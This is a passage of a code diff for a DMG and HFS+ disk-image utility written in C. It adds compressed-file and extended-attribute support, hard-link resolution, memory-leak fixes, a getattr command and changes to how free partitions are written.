0x40000033; - partition[2].pmLgBootStart = 0x0; - partition[2].pmBootSize = 0x0; - partition[2].pmBootAddr = 0x0; - partition[2].pmBootAddr2 = 0x0; - partition[2].pmBootEntry = 0x0; - partition[2].pmBootEntry2 = 0x0; - partition[2].pmBootCksum = 0x0; - partition[2].pmProcessor[0] = '\0'; - partition[2].bootCode = BOOTCODE_GOON; - - partition[3].pmSig = APPLE_PARTITION_MAP_SIGNATURE; - partition[3].pmSigPad = 0; - partition[3].pmMapBlkCnt = 0x4; - partition[3].pmPartName[0] = '\0'; - strcpy((char*)partition[3].pmParType, "Apple_Free"); - partition[3].pmPyPartStart = USER_OFFSET + numSectors; - partition[3].pmPartBlkCnt = FREE_SIZE; - partition[3].pmLgDataStart = 0; - partition[3].pmDataCnt = 0x0; - partition[3].pmPartStatus = 0x0; - partition[3].pmLgBootStart = 0x0; - partition[3].pmBootSize = 0x0; - partition[3].pmBootAddr = 0x0; - partition[3].pmBootAddr2 = 0x0; - partition[3].pmBootEntry = 0x0; - partition[3].pmBootEntry2 = 0x0; - partition[3].pmBootCksum = 0x0; - partition[3].pmProcessor[0] = '\0'; - partition[3].bootCode = 0; - - return partition; + return orig; } -void writeFreePartition(AbstractFile* outFile, uint32_t numSectors, ResourceKey** resources) { +int writeFreePartition(int pNum, AbstractFile* outFile, uint32_t offset, uint32_t numSectors, ResourceKey** resources) { BLKXTable* blkx; blkx = (BLKXTable*) malloc(sizeof(BLKXTable) + (2 * sizeof(BLKXRun))); blkx->fUDIFBlocksSignature = UDIF_BLOCK_SIGNATURE; blkx->infoVersion = 1; - blkx->firstSectorNumber = USER_OFFSET + numSectors; - blkx->sectorCount = FREE_SIZE; + blkx->firstSectorNumber = offset; + blkx->sectorCount = numSectors; blkx->dataStart = 0; blkx->decompressBufferRequested = 0; - blkx->blocksDescriptor = 3; + blkx->blocksDescriptor = pNum; blkx->reserved1 = 0; blkx->reserved2 = 0; blkx->reserved3 = 0; @@ -774,17 +823,20 @@ void writeFreePartition(AbstractFile* outFile, uint32_t numSectors, ResourceKey* blkx->runs[0].type = BLOCK_IGNORE; blkx->runs[0].reserved = 0; blkx->runs[0].sectorStart = 0; - blkx->runs[0].sectorCount = FREE_SIZE; + blkx->runs[0].sectorCount = numSectors; blkx->runs[0].compOffset = outFile->tell(outFile); blkx->runs[0].compLength = 0; blkx->runs[1].type = BLOCK_TERMINATOR; blkx->runs[1].reserved = 0; - blkx->runs[1].sectorStart = FREE_SIZE; + blkx->runs[1].sectorStart = numSectors; blkx->runs[1].sectorCount = 0; blkx->runs[1].compOffset = blkx->runs[0].compOffset; blkx->runs[1].compLength = 0; - *resources = insertData(*resources, "blkx", 3, " (Apple_Free : 4)", (const char*) blkx, sizeof(BLKXTable) + (blkx->blocksRunCount * sizeof(BLKXRun)), ATTRIBUTE_HDIUTIL); + char pName[100]; + sprintf(pName, " (Apple_Free : %d)", pNum + 1); + *resources = insertData(*resources, "blkx", pNum, pName, (const char*) blkx, sizeof(BLKXTable) + (blkx->blocksRunCount * sizeof(BLKXRun)), ATTRIBUTE_HDIUTIL); free(blkx); + return pNum + 1; } dmg/partition.c @@ -95,7 +95,7 @@ static char plstData[1032] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; -const char* plistHeader = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n"; +const char* plistHeader = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n"; const char* plistFooter = "</dict>\n</plist>\n"; static void flipSizeResource(unsigned char* data, char out) { @@ -103,24 +103,23 @@ static void flipSizeResource(unsigned char* data, char out) { size = (SizeResource*) data; - FLIPENDIAN(size->version); - FLIPENDIAN(size->isHFS); - FLIPENDIAN(size->unknown2); - FLIPENDIAN(size->unknown3); - FLIPENDIAN(size->volumeModified); - FLIPENDIAN(size->unknown4); - FLIPENDIAN(size->volumeSignature); - FLIPENDIAN(size->sizePresent); + FLIPENDIANLE(size->version); + FLIPENDIANLE(size->isHFS); + FLIPENDIANLE(size->unknown2); + FLIPENDIANLE(size->unknown3); + FLIPENDIANLE(size->volumeModified); + FLIPENDIANLE(size->unknown4); + FLIPENDIANLE(size->volumeSignature); + FLIPENDIANLE(size->sizePresent); } static void flipCSumResource(unsigned char* data, char out) { CSumResource* cSum; - cSum = (CSumResource*) data; - FLIPENDIAN(cSum->version); - FLIPENDIAN(cSum->type); - FLIPENDIAN(cSum->checksum); + FLIPENDIANLE(cSum->version); + FLIPENDIANLE(cSum->type); + FLIPENDIANLE(cSum->checksum); } @@ -170,17 +169,22 @@ static void flipBLKX(unsigned char* data, char out) { FLIPENDIAN(blkx->blocksRunCount); for(i = 0; i < blkx->blocksRunCount; i++) { flipBLKXRun(&(blkx->runs[i])); - } - - /*printf("fUDIFBlocksSignature: 0x%x\n", blkx->fUDIFBlocksSignature); + } + } +/* + printf("fUDIFBlocksSignature: 0x%x\n", blkx->fUDIFBlocksSignature); printf("infoVersion: 0x%x\n", blkx->infoVersion); printf("firstSectorNumber: 0x%llx\n", blkx->firstSectorNumber); printf("sectorCount: 0x%llx\n", blkx->sectorCount); printf("dataStart: 0x%llx\n", blkx->dataStart); printf("decompressBufferRequested: 0x%x\n", blkx->decompressBufferRequested); printf("blocksDescriptor: 0x%x\n", blkx->blocksDescriptor); - printf("blocksRunCount: 0x%x\n", blkx->blocksRunCount);*/ - } + printf("blocksRunCount: 0x%x\n", blkx->blocksRunCount); + + for(i = 0; i < 0x20; i++) + { + printf("checksum[%d]: %x\n", i, blkx->checksum.data[i]); + }*/ } static char* getXMLString(char** location) { @@ -412,7 +416,7 @@ static void writeNSizResource(NSizResource* data, char* buffer) { sprintf(itemBuffer, "\t<key>version</key>\n\t<integer>%d</integer>\n", (int32_t)(data->version)); strcat(buffer, itemBuffer); if(data->isVolume) { - sprintf(itemBuffer, "\t<key>bytes</key>\n\t<integer>%d</integer>\n", (int32_t)(data->volumeSignature)); + sprintf(itemBuffer, "\t<key>volume-signature</key>\n\t<integer>%d</integer>\n", (int32_t)(data->volumeSignature)); strcat(buffer, itemBuffer); } strcat(buffer, plistFooter); @@ -521,6 +525,24 @@ void releaseNSiz(NSizResource* nSiz) { } } +void outResources(AbstractFile* file, AbstractFile* out) +{ + char* xml; + UDIFResourceFile resourceFile; + off_t fileLength; + + fileLength = file->getLength(file); + file->seek(file, fileLength - sizeof(UDIFResourceFile)); + readUDIFResourceFile(file, &resourceFile); + xml = (char*) malloc((size_t)resourceFile.fUDIFXMLLength); + file->seek(file, (off_t)(resourceFile.fUDIFXMLOffset)); + ASSERT(file->read(file, xml, (size_t)resourceFile.fUDIFXMLLength) == (size_t)resourceFile.fUDIFXMLLength, "fread"); + ASSERT(out->write(out, xml, (size_t)resourceFile.fUDIFXMLLength) == (size_t)resourceFile.fUDIFXMLLength, "fwrite"); + + file->close(file); + out->close(out); +} + ResourceKey* readResources(AbstractFile* file, UDIFResourceFile* resourceFile) { char* xml; char* curLoc; @@ -624,7 +646,7 @@ ResourceKey* readResources(AbstractFile* file, UDIFResourceFile* resourceFile) { return toReturn; } -static void writeResourceData(AbstractFile* file, ResourceData* data, FlipDataFunc flipData, int tabLength) { +static void writeResourceData(AbstractFile* file, ResourceData* data, ResourceKey* curResource, FlipDataFunc flipData, int tabLength) { unsigned char* dataBuf; char* tabs; int i; @@ -637,6 +659,10 @@ static void writeResourceData(AbstractFile* file, ResourceData* data, FlipDataFu abstractFilePrint(file, "%s<dict>\n", tabs); abstractFilePrint(file, "%s\t<key>Attributes</key>\n%s\t<string>0x%04x</string>\n", tabs, tabs, data->attributes); + + if(strcmp((char*) curResource->key, "blkx") == 0) + abstractFilePrint(file, "%s\t<key>CFName</key>\n%s\t<string>%s</string>\n", tabs, tabs, data->name); + abstractFilePrint(file, "%s\t<key>Data</key>\n%s\t<data>\n", tabs, tabs); if(flipData) { @@ -669,8 +695,8 @@ void writeResources(AbstractFile* file, ResourceKey* resources) { abstractFilePrint(file, "\t\t<key>%s</key>\n\t\t<array>\n", curResource->key); curData = curResource->data; while(curData != NULL) { - writeResourceData(file, curData, curResource->flipData, 3); - curData = curData->next; + writeResourceData(file, curData, curResource, curResource->flipData, 3); + curData = curData->next; } abstractFilePrint(file, "\t\t</array>\n", curResource->key); curResource = curResource->next; @@ -837,6 +863,7 @@ ResourceKey* makeSize(HFSPlusVolumeHeader* volumeHeader) { memset(&size, 0, sizeof(SizeResource)); size.version = 5; size.isHFS = 1; + size.unknown1 = 0; size.unknown2 = 0; size.unknown3 = 0; size.volumeModified = volumeHeader->modifyDate; @@ -845,6 +872,6 @@ ResourceKey* makeSize(HFSPlusVolumeHeader* volumeHeader) { size.sizePresent = 1; printf("making size data\n"); - return insertData(NULL, "size", 0, "", (const char*)(&size), sizeof(SizeResource), 0); + return insertData(NULL, "size", 2, "", (const char*)(&size), sizeof(SizeResource), 0); } dmg/resources.c @@ -1,6 +1,15 @@ +INCLUDE(FindZLIB) + +IF(NOT ZLIB_FOUND) + message(FATAL_ERROR "zlib is required for hfs!") +ENDIF(NOT ZLIB_FOUND) + +include_directories(${ZLIB_INCLUDE_DIR}) +link_directories(${ZLIB_LIBRARIES}) + link_directories (${PROJECT_BINARY_DIR}/common) -add_library(hfs btree.c catalog.c extents.c fastunicodecompare.c flatfile.c hfslib.c rawfile.c utility.c volume.c) -target_link_libraries(hfs common) +add_library(hfs btree.c catalog.c extents.c xattr.c fastunicodecompare.c flatfile.c hfslib.c rawfile.c utility.c volume.c hfscompress.c) +target_link_libraries(hfs common z) add_executable(hfsplus hfs.c) target_link_libraries (hfsplus hfs) hfs/CMakeLists.txt @@ -36,8 +36,10 @@ BTHeaderRec* readBTHeaderRec(io_func* io) { headerRec = (BTHeaderRec*) malloc(sizeof(BTHeaderRec)); - if(!READ(io, sizeof(BTNodeDescriptor), sizeof(BTHeaderRec), headerRec)) + if(!READ(io, sizeof(BTNodeDescriptor), sizeof(BTHeaderRec), headerRec)) { + free(headerRec); return NULL; + } FLIPENDIAN(headerRec->treeDepth); FLIPENDIAN(headerRec->rootNode); @@ -239,11 +241,23 @@ static void* searchNode(BTree* tree, uint32_t root, BTKey* searchKey, int *exact free(descriptor); return READ_DATA(tree, lastRecordDataOffset, tree->io); - } else { + } else if(descriptor->kind == kBTIndexNode) { free(descriptor); return searchNode(tree, getNodeNumberFromPointerRecord(lastRecordDataOffset, tree->io), searchKey, exact, nodeNumber, recordNumber); - } + } else { + if(nodeNumber != NULL) + *nodeNumber = root; + + if(recordNumber != NULL) + *recordNumber = i; + + if(exact != NULL) + *exact = FALSE; + + free(descriptor); + return NULL; + } } void* search(BTree* tree, BTKey* searchKey, int *exact, uint32_t *nodeNumber, int *recordNumber) { @@ -466,6 +480,7 @@ static uint32_t traverseNode(uint32_t nodeNum, BTree* tree, unsigned char* map, printf("\n"); fflush(stdout); } free(previousKey); + previousKey = NULL; } if(displayTree) { @@ -503,6 +518,8 @@ static uint32_t traverseNode(uint32_t nodeNum, BTree* tree, unsigned char* map, lastrecordDataOffset = recordDataOffset; } + if(previousKey != NULL) free(previousKey); + free(descriptor); return count; @@ -629,7 +646,10 @@ int debugBTree(BTree* tree, int displayTree) { } else { printf("Performing tree traversal...\n"); fflush(stdout); traverseCount = traverseNode(tree->headerRec->rootNode, tree, map, 0, &retFirstKey, &retLastKey, heightTable, &errorCount, displayTree); - + + free(retFirstKey); + free(retLastKey); + printf("Performing linear traversal...\n"); fflush(stdout); linearCount = linearCheck(heightTable, map, tree, &errorCount); } @@ -765,6 +785,7 @@ static int growBTree(BTree* tree) { if(byteNumber < (tree->headerRec->nodeSize - 256)) { ASSERT(writeBTHeaderRec(tree), "writeBTHeaderREc"); + free(buffer); return TRUE; } else { byteNumber -= tree->headerRec->nodeSize - 256; @@ -1292,7 +1313,9 @@ static int increaseHeight(BTree* tree, uint32_t newNode) { ASSERT(writeBTNodeDescriptor(&newDescriptor, tree->headerRec->rootNode, tree), "writeBTNodeDescriptor"); ASSERT(writeBTHeaderRec(tree), "writeBTHeaderRec"); - + + free(oldRootKey); + free(newNodeKey); return TRUE; } hfs/btree.c @@ -344,76 +344,93 @@ HFSPlusCatalogRecord* getRecordByCNID(HFSCatalogNodeID CNID, Volume* volume) { } CatalogRecordList* getFolderContents(HFSCatalogNodeID CNID, Volume* volume) { - BTree* tree; - HFSPlusCatalogThread* record; - HFSPlusCatalogKey key; - uint32_t nodeNumber; - int recordNumber; - - BTNodeDescriptor* descriptor; - off_t recordOffset; - off_t recordDataOffset; - HFSPlusCatalogKey* currentKey; - - CatalogRecordList* list; - CatalogRecordList* lastItem; - CatalogRecordList* item; - - tree = volume->catalogTree; - - key.keyLength = sizeof(key.parentID) + sizeof(key.nodeName.length); - key.parentID = CNID; - key.nodeName.length = 0; - - list = NULL; - - record = (HFSPlusCatalogThread*) search(tree, (BTKey*)(&key), NULL, &nodeNumber, &recordNumber); - - if(record == NULL) - return NULL; - - free(record); - - ++recordNumber; - - while(nodeNumber != 0) { - descriptor = readBTNodeDescriptor(nodeNumber, tree); - - while(recordNumber < descriptor->numRecords) { - recordOffset = getRecordOffset(recordNumber, nodeNumber, tree); - currentKey = (HFSPlusCatalogKey*) READ_KEY(tree, recordOffset, tree->io); - recordDataOffset = recordOffset + currentKey->keyLength + sizeof(currentKey->keyLength); - - if(currentKey->parentID == CNID) { - item = (CatalogRecordList*) malloc(sizeof(CatalogRecordList)); - item->name = currentKey->nodeName; - item->record = (HFSPlusCatalogRecord*) READ_DATA(tree, recordDataOffset, tree->io); - item->next = NULL; - - if(list == NULL) { - list = item; - } else { - lastItem->next = item; - } - - lastItem = item; - free(currentKey); - } else { - free(currentKey); - free(descriptor); - return list; - } - - recordNumber++; - } - - nodeNumber = descriptor->fLink; - recordNumber = 0; - - free(descriptor); - } - - return list; + BTree* tree; + HFSPlusCatalogThread* record; + HFSPlusCatalogKey key; + uint32_t nodeNumber; + int recordNumber; + + BTNodeDescriptor* descriptor; + off_t recordOffset; + off_t recordDataOffset; + HFSPlusCatalogKey* currentKey; + + CatalogRecordList* list; + CatalogRecordList* lastItem; + CatalogRecordList* item; + + char pathBuffer[1024]; + HFSPlusCatalogRecord* toReturn; + HFSPlusCatalogKey nkey; + int exact; + + tree = volume->catalogTree; + + key.keyLength = sizeof(key.parentID) + sizeof(key.nodeName.length); + key.parentID = CNID; + key.nodeName.length = 0; + + list = NULL; + + record = (HFSPlusCatalogThread*) search(tree, (BTKey*)(&key), NULL, &nodeNumber, &recordNumber); + + if(record == NULL) + return NULL; + + free(record); + + ++recordNumber; + + while(nodeNumber != 0) { + descriptor = readBTNodeDescriptor(nodeNumber, tree); + + while(recordNumber < descriptor->numRecords) { + recordOffset = getRecordOffset(recordNumber, nodeNumber, tree); + currentKey = (HFSPlusCatalogKey*) READ_KEY(tree, recordOffset, tree->io); + recordDataOffset = recordOffset + currentKey->keyLength + sizeof(currentKey->keyLength); + + if(currentKey->parentID == CNID) { + item = (CatalogRecordList*) malloc(sizeof(CatalogRecordList)); + item->name = currentKey->nodeName; + item->record = (HFSPlusCatalogRecord*) READ_DATA(tree, recordDataOffset, tree->io); + + if(item->record->recordType == kHFSPlusFileRecord && (((HFSPlusCatalogFile*)item->record)->userInfo.fileType) == kHardLinkFileType) { + sprintf(pathBuffer, "iNode%d", ((HFSPlusCatalogFile*)item->record)->permissions.special.iNodeNum); + nkey.parentID = volume->metadataDir; + ASCIIToUnicode(pathBuffer, &nkey.nodeName); + nkey.keyLength = sizeof(nkey.parentID) + sizeof(nkey.nodeName.length) + (sizeof(uint16_t) * nkey.nodeName.length); + + toReturn = (HFSPlusCatalogRecord*) search(volume->catalogTree, (BTKey*)(&nkey), &exact, NULL, NULL); + + free(item->record); + item->record = toReturn; + } + item->next = NULL; + + if(list == NULL) { + list = item; + } else { + lastItem->next = item; + } + + lastItem = item; + free(currentKey); + } else { + free(currentKey); + free(descriptor); + return list; + } + + recordNumber++; + } + + nodeNumber = descriptor->fLink; + recordNumber = 0; + + free(descriptor); + } + + return list; } void releaseCatalogRecordList(CatalogRecordList* list) { @@ -430,6 +447,8 @@ HFSPlusCatalogRecord* getLinkTarget(HFSPlusCatalogRecord* record, HFSCatalogNode io_func* io; char pathBuffer[1024]; HFSPlusCatalogRecord* toReturn; + HFSPlusCatalogKey nkey; + int exact; if(record->recordType == kHFSPlusFileRecord && (((HFSPlusCatalogFile*)record)->permissions.fileMode & S_IFLNK) == S_IFLNK) { io = openRawFile(((HFSPlusCatalogFile*)record)->fileID, &(((HFSPlusCatalogFile*)record)->dataFork), record, volume); @@ -439,11 +458,43 @@ HFSPlusCatalogRecord* getLinkTarget(HFSPlusCatalogRecord* record, HFSCatalogNode toReturn = getRecordFromPath3(pathBuffer, volume, NULL, key, TRUE, TRUE, parentID); free(record); return toReturn; + } else if(record->recordType == kHFSPlusFileRecord && (((HFSPlusCatalogFile*)record)->userInfo.fileType) == kHardLinkFileType) { + sprintf(pathBuffer, "iNode%d", ((HFSPlusCatalogFile*)record)->permissions.special.iNodeNum); + nkey.parentID = volume->metadataDir; + ASCIIToUnicode(pathBuffer, &nkey.nodeName); + nkey.keyLength = sizeof(nkey.parentID) + sizeof(nkey.nodeName.length) + (sizeof(uint16_t) * nkey.nodeName.length); + + toReturn = (HFSPlusCatalogRecord*) search(volume->catalogTree, (BTKey*)(&nkey), &exact, NULL, NULL); + + free(record); + + return toReturn; } else { return record; } } +static const uint16_t METADATA_DIR[] = {0, 0, 0, 0, 'H', 'F', 'S', '+', ' ', 'P', 'r', 'i', 'v', 'a', 't', 'e', ' ', 'D', 'a', 't', 'a'}; + +HFSCatalogNodeID getMetadataDirectoryID(Volume* volume) { + HFSPlusCatalogKey key; + HFSPlusCatalogFolder* record; + int exact; + HFSCatalogNodeID id; + + key.nodeName.length = sizeof(METADATA_DIR) / sizeof(uint16_t); + key.keyLength = sizeof(key.parentID) + sizeof(key.nodeName.length) + sizeof(METADATA_DIR); + key.parentID = kHFSRootFolderID; + memcpy(key.nodeName.unicode, METADATA_DIR, sizeof(METADATA_DIR)); + + record = (HFSPlusCatalogFolder*) search(volume->catalogTree, (BTKey*)(&key), &exact, NULL, NULL); + id = record->folderID; + + free(record); + + return id; +} + HFSPlusCatalogRecord* getRecordFromPath(const char* path, Volume* volume, char **name, HFSPlusCatalogKey* retKey) { return getRecordFromPath2(path, volume, name, retKey, TRUE); } @@ -741,69 +792,92 @@ int move(const char* source, const char* dest, Volume* volume) { } int removeFile(const char* fileName, Volume* volume) { - HFSPlusCatalogRecord* record; - HFSPlusCatalogKey key; - io_func* io; - HFSPlusCatalogFolder* parentFolder; - - record = getRecordFromPath3(fileName, volume, NULL, &key, TRUE, FALSE, kHFSRootFolderID); - if(record != NULL) { - parentFolder = (HFSPlusCatalogFolder*) getRecordByCNID(key.parentID, volume); - if(parentFolder != NULL) { - if(parentFolder->recordType != kHFSPlusFolderRecord) { - ASSERT(FALSE, "parent not folder"); - free(parentFolder); - return FALSE; - } - } else { - ASSERT(FALSE, "can't find parent"); - return FALSE; - } + HFSPlusCatalogRecord* record; + HFSPlusCatalogKey key; + io_func* io; + HFSPlusCatalogFolder* parentFolder; + + record = getRecordFromPath3(fileName, volume, NULL, &key, TRUE, FALSE, kHFSRootFolderID); + if(record != NULL) { + parentFolder = (HFSPlusCatalogFolder*) getRecordByCNID(key.parentID, volume); + if(parentFolder != NULL) { + if(parentFolder->recordType != kHFSPlusFolderRecord) { + ASSERT(FALSE, "parent not folder"); + free(parentFolder); + return FALSE; + } + } else { + ASSERT(FALSE, "can't find parent"); + return FALSE; + } - if(record->recordType == kHFSPlusFileRecord) { - io = openRawFile(((HFSPlusCatalogFile*)record)->fileID, &((HFSPlusCatalogFile*)record)->dataFork, record, volume); - allocate((RawFile*)io->data, 0); - CLOSE(io); + if(record->recordType == kHFSPlusFileRecord) { + io = openRawFile(((HFSPlusCatalogFile*)record)->fileID, &((HFSPlusCatalogFile*)record)->dataFork, record, volume); + allocate((RawFile*)io->data, 0); + CLOSE(io); + + removeFromBTree(volume->catalogTree, (BTKey*)(&key)); + XAttrList* next; + XAttrList* attrs = getAllExtendedAttributes(((HFSPlusCatalogFile*)record)->fileID, volume); + if(attrs != NULL) { + while(attrs != NULL) { + next = attrs->next; + unsetAttribute(volume, ((HFSPlusCatalogFile*)record)->fileID, attrs->name); + free(attrs->name); + free(attrs); + attrs = next; + } + } + + + key.nodeName.length = 0; + key.parentID = ((HFSPlusCatalogFile*)record)->fileID; + key.keyLength = sizeof(key.parentID) + sizeof(key.nodeName.length); + removeFromBTree(volume->catalogTree, (BTKey*)(&key)); + + volume->volumeHeader->fileCount--; + } else { + if(((HFSPlusCatalogFolder*)record)->valence > 0) { + free(record); + free(parentFolder); + ASSERT(FALSE, "folder not empty"); + return FALSE; + } else { + removeFromBTree(volume->catalogTree, (BTKey*)(&key)); + XAttrList* next; + XAttrList* attrs = getAllExtendedAttributes(((HFSPlusCatalogFolder*)record)->folderID, volume); + if(attrs != NULL) { + while(attrs != NULL) { + next = attrs->next; + unsetAttribute(volume, ((HFSPlusCatalogFolder*)record)->folderID, attrs->name); + free(attrs->name); + free(attrs); + attrs = next; + } + } + + key.nodeName.length = 0; + key.parentID = ((HFSPlusCatalogFolder*)record)->folderID; + key.keyLength = sizeof(key.parentID) + sizeof(key.nodeName.length); + removeFromBTree(volume->catalogTree, (BTKey*)(&key)); + } + + parentFolder->folderCount--; + volume->volumeHeader->folderCount--; + } + parentFolder->valence--; + updateCatalog(volume, (HFSPlusCatalogRecord*) parentFolder); + updateVolume(volume); - removeFromBTree(volume->catalogTree, (BTKey*)(&key)); - - key.nodeName.length = 0; - key.parentID = ((HFSPlusCatalogFile*)record)->fileID; - key.keyLength = sizeof(key.parentID) + sizeof(key.nodeName.length); - removeFromBTree(volume->catalogTree, (BTKey*)(&key)); - - volume->volumeHeader->fileCount--; - } else { - if(((HFSPlusCatalogFolder*)record)->valence > 0) { free(record); free(parentFolder); - ASSERT(FALSE, "folder not empty"); - return FALSE; - } else { - removeFromBTree(volume->catalogTree, (BTKey*)(&key)); - - key.nodeName.length = 0; - key.parentID = ((HFSPlusCatalogFolder*)record)->folderID; - key.keyLength = sizeof(key.parentID) + sizeof(key.nodeName.length); - removeFromBTree(volume->catalogTree, (BTKey*)(&key)); - } - - parentFolder->folderCount--; - volume->volumeHeader->folderCount--; - } - parentFolder->valence--; - updateCatalog(volume, (HFSPlusCatalogRecord*) parentFolder); - updateVolume(volume); - free(record); - free(parentFolder); - - return TRUE; - } else { - free(parentFolder); - ASSERT(FALSE, "cannot find record"); - return FALSE; - } + return TRUE; + } else { + free(parentFolder); + ASSERT(FALSE, "cannot find record"); + return FALSE; + } } int makeSymlink(const char* pathName, const char* target, Volume* volume) { hfs/catalog.c @@ -222,6 +222,40 @@ void cmd_grow(Volume* volume, int argc, const char *argv[]) { printf("grew volume: %" PRId64 "\n", newSize); } +void cmd_getattr(Volume* volume, int argc, const char *argv[]) { + HFSPlusCatalogRecord* record; + + if(argc < 3) { + printf("Not enough arguments"); + return; + } + + record = getRecordFromPath(argv[1], volume, NULL, NULL); + + if(record != NULL) { + HFSCatalogNodeID id; + uint8_t* data; + size_t size; + if(record->recordType == kHFSPlusFileRecord) + id = ((HFSPlusCatalogFile*)record)->fileID; + else + id = ((HFSPlusCatalogFolder*)record)->folderID; + + size = getAttribute(volume, id, argv[2], &data); + + if(size > 0) { + fwrite(data, size, 1, stdout); + free(data); + } else { + printf("No such attribute\n"); + } + } else { + printf("No such file or directory\n"); + } + + free(record); +} + void TestByteOrder() { short int word = 0x0001; @@ -281,6 +315,8 @@ int main(int argc, const char *argv[]) { cmd_addall(volume, argc - 2, argv + 2); } else if(strcmp(argv[2], "grow") == 0) { cmd_grow(volume, argc - 2, argv + 2); + } else if(strcmp(argv[2], "getattr") == 0) { + cmd_getattr(volume, argc - 2, argv + 2); } else if(strcmp(argv[2], "debug") == 0) { if(argc > 3 && strcmp(argv[3], "verbose") == 0) { debugBTree(volume->catalogTree, TRUE); hfs/hfs.c @@ -5,12 +5,19 @@ #include <sys/types.h> #include "common.h" #include <hfs/hfsplus.h> +#include <hfs/hfscompress.h> #include "abstractfile.h" #include <sys/stat.h> #include <inttypes.h> #define BUFSIZE 1024*1024 +static int silence = 0; + +void hfs_setsilence(int s) { + silence = s; +} + void writeToFile(HFSPlusCatalogFile* file, AbstractFile* output, Volume* volume) { unsigned char* buffer; io_func* io; @@ -19,16 +26,27 @@ void writeToFile(HFSPlusCatalogFile* file, AbstractFile* output, Volume* volume) buffer = (unsigned char*) malloc(BUFSIZE); - io = openRawFile(file->fileID, &file->dataFork, (HFSPlusCatalogRecord*)file, volume); - if(io == NULL) { - hfs_panic("error opening file"); - free(buffer); - return; - } - - curPosition = 0; - bytesLeft = file->dataFork.logicalSize; - + if(file->permissions.ownerFlags & UF_COMPRESSED) { + io = openHFSPlusCompressed(volume, file); + if(io == NULL) { + hfs_panic("error opening file"); + free(buffer); + return; + } + + curPosition = 0; + bytesLeft = ((HFSPlusCompressed*) io->data)->decmpfs->size; + } else { + io = openRawFile(file->fileID, &file->dataFork, (HFSPlusCatalogRecord*)file, volume); + if(io == NULL) { + hfs_panic("error opening file"); + free(buffer); + return; + } + + curPosition = 0; + bytesLeft = file->dataFork.logicalSize; + } while(bytesLeft > 0) { if(bytesLeft > BUFSIZE) { if(!READ(io, curPosition, BUFSIZE, buffer)) { @@ -65,16 +83,24 @@ void writeToHFSFile(HFSPlusCatalogFile* file, AbstractFile* input, Volume* volum bytesLeft = input->getLength(input); - io = openRawFile(file->fileID, &file->dataFork, (HFSPlusCatalogRecord*)file, volume); - if(io == NULL) { - hfs_panic("error opening file"); - free(buffer); - return; + if(file->permissions.ownerFlags & UF_COMPRESSED) { + io = openHFSPlusCompressed(volume, file); + if(io == NULL) { + hfs_panic("error opening file"); + free(buffer); + return; + } + } else { + io = openRawFile(file->fileID, &file->dataFork, (HFSPlusCatalogRecord*)file, volume); + if(io == NULL) { + hfs_panic("error opening file"); + free(buffer); + return; + } + allocate((RawFile*)io->data, bytesLeft); } - curPosition = 0; - - allocate((RawFile*)io->data, bytesLeft); + curPosition = 0; while(bytesLeft > 0) { if(bytesLeft > BUFSIZE) { @@ -475,12 +501,25 @@ int copyAcrossVolumes(Volume* volume1, Volume* volume2, char* path1, char* path2 bufferSize = 0; tmpFile = createAbstractFileFromMemoryFile((void**)&buffer, &bufferSize); - printf("retrieving... "); fflush(stdout); + if(!silence) + { + printf("retrieving... "); fflush(stdout); + } + get_hfs(volume1, path1, tmpFile); tmpFile->seek(tmpFile, 0); - printf("writing (%ld)... ", (long) tmpFile->getLength(tmpFile)); fflush(stdout); + + if(!silence) + { + printf("writing (%ld)... ", (long) tmpFile->getLength(tmpFile)); fflush(stdout); + } + ret = add_hfs(volume2, tmpFile, path2); - printf("done\n"); + + if(!silence) + { + printf("done\n"); + } free(buffer); @@ -494,6 +533,8 @@ void displayFolder(HFSCatalogNodeID folderID, Volume* volume) { HFSPlusCatalogFile* file; time_t fileTime; struct tm *date; + HFSPlusDecmpfs* compressData; + size_t attrSize; theList = list = getFolderContents(folderID, volume); @@ -510,15 +551,22 @@ void displayFolder(HFSCatalogNodeID folderID, Volume* volume) { printf("%06o ", file->permissions.fileMode); printf("%3d ", file->permissions.ownerID); printf("%3d ", file->permissions.groupID); - printf("%12" PRId64 " ", file->dataFork.logicalSize); + if(file->permissions.ownerFlags & UF_COMPRESSED) { + attrSize = getAttribute(volume, file->fileID, "com.apple.decmpfs", (uint8_t**)(&compressData)); + flipHFSPlusDecmpfs(compressData); + printf("%12" PRId64 " ", compressData->size); + free(compressData); + } else { + printf("%12" PRId64 " ", file->dataFork.logicalSize); + } fileTime = APPLE_TO_UNIX_TIME(file->contentModDate); } date = localtime(&fileTime); if(date != NULL) { - printf("%2d/%2d/%4d %02d:%02d ", date->tm_mon, date->tm_mday, date->tm_year + 1900, date->tm_hour, date->tm_min); + printf("%2d/%2d/%4d %02d:%02d ", date->tm_mon, date->tm_mday, date->tm_year + 1900, date->tm_hour, date->tm_min); } else { - printf(" "); + printf(" "); } printUnicode(&list->name); @@ -530,14 +578,24 @@ void displayFolder(HFSCatalogNodeID folderID, Volume* volume) { releaseCatalogRecordList(theList); } -void displayFileLSLine(HFSPlusCatalogFile* file, const char* name) { +void displayFileLSLine(Volume* volume, HFSPlusCatalogFile* file, const char* name) { time_t fileTime; struct tm *date; + HFSPlusDecmpfs* compressData; printf("%06o ", file->permissions.fileMode); printf("%3d ", file->permissions.ownerID); printf("%3d ", file->permissions.groupID); - printf("%12" PRId64 " ", file->dataFork.logicalSize); + + if(file->permissions.ownerFlags & UF_COMPRESSED) { + getAttribute(volume, file->fileID, "com.apple.decmpfs", (uint8_t**)(&compressData)); + flipHFSPlusDecmpfs(compressData); + printf("%12" PRId64 " ", compressData->size); + free(compressData); + } else { + printf("%12" PRId64 " ", file->dataFork.logicalSize); + } + fileTime = APPLE_TO_UNIX_TIME(file->contentModDate); date = localtime(&fileTime); if(date != NULL) { @@ -546,6 +604,19 @@ void displayFileLSLine(HFSPlusCatalogFile* file, const char* name) { printf(" "); } printf("%s\n", name); + + XAttrList* next; + XAttrList* attrs = getAllExtendedAttributes(file->fileID, volume); + if(attrs != NULL) { + 